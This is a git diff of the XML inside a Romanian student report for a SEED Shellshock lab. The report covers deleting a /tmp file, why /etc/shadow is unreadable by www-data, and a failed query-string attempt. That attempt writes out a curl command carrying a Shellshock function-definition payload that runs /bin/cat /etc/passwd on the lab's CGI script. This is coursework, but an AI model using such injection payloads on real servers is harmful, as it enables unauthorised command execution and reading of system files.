-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Sarcina 3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>D</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ștergerea fișierului din </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-        <w:t>/tmp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="20">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-8255</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>110490</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="4235450"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="19" name="Image19" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="19" name="Image19" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4235450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -4483,14 +4382,128 @@
         <w:pStyle w:val="Normal"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
+          <w:numId w:val="8"/>
         </w:numPr>
-        <w:spacing w:before="0" w:after="0"/>
-        <w:ind w:left="720" w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>observam ca numarul de fisiere din tmp e 0, deci fisierul BirlutiuAtac.txt s-a sters</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4700,7 +4713,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId28"/>
+      <w:headerReference w:type="default" r:id="rId30"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -5724,6 +5737,143 @@
   <w:abstractNum w:abstractNumId="8">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -5863,6 +6013,9 @@
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -4417,216 +4417,274 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Intrebarea 1: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> veti putea fura continutul fisierului/etc/shadowde pe server?  De ce da sau de ce nu? Informatiile obtinute in Sarcina 3.B ar trebui sa va ofere un indiciu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>NU</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-acest </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>fișier este protejat prin permisiuni de acces, astfel încât să fie accesibil doar de către utilizatorul "root" sau un alt utilizator cu drepturi de administrare →</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> observam ca id-ul utilizator al procesului este 33 www-data care nu are privilegiu de a accesa acest fisier ( nu este root)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>Intrebarea 2:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>solicitarile HTTP GET ataseaza de obicei date in adresa URL, dupa marca ”?”.  Acest lucru ar putea fi o alta abordare pe care o putem folosi pentru a lansa atacul. In exemplul urmator, atasam cateva date in URL si am constatat ca datele sunt folosite pentrua seta urmatoarea variabila de mediu: QUERY_STRING=.…</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>AM incercat varianta urmatoare dar am obtinu eroare, la fel si daca nu pun continutul intre “”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">curl  -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId30">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>vul</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>?"() { echo salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>echo Content_type: text/plain; echo; /bin/cat /etc/passwd"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>=&gt; nu putem</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="21">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="3316605"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="20" name="Image20" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="20" name="Image20" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3316605"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -4677,6 +4735,292 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
